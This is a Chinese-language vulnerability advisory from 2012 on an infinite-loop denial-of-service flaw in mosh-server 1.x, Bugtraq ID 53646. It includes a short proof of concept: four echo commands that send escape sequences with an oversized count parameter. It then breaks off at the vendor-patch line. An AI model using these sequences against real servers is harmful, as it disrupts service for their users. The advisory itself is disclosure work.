发布日期:2012-05-21
更新日期:2012-05-23
受影响系统:
Mosh Mosh 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53646
Mosh是代替SSH的移动壳,允许漫游、支持断点连接、提供智能本地回应和用户击键行编辑的远程终端应用,可用于GNU/Linux、FreeBSD、Mac OS X。
mosh-server在处理命令时存在错误,可被利用传递控制符到服务器并触发无限循环。
<*来源:Timo Juhani Lindfors (timo.lindfors@iki.fi)
链接:
https://github.com/keithw/mosh/issues/271
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
echo -en "\e[2147483647L"
echo -en "\e[2147483647M"
echo -en "\e[2147483647@"
echo -en "\e[2147483647P"
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mosh
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: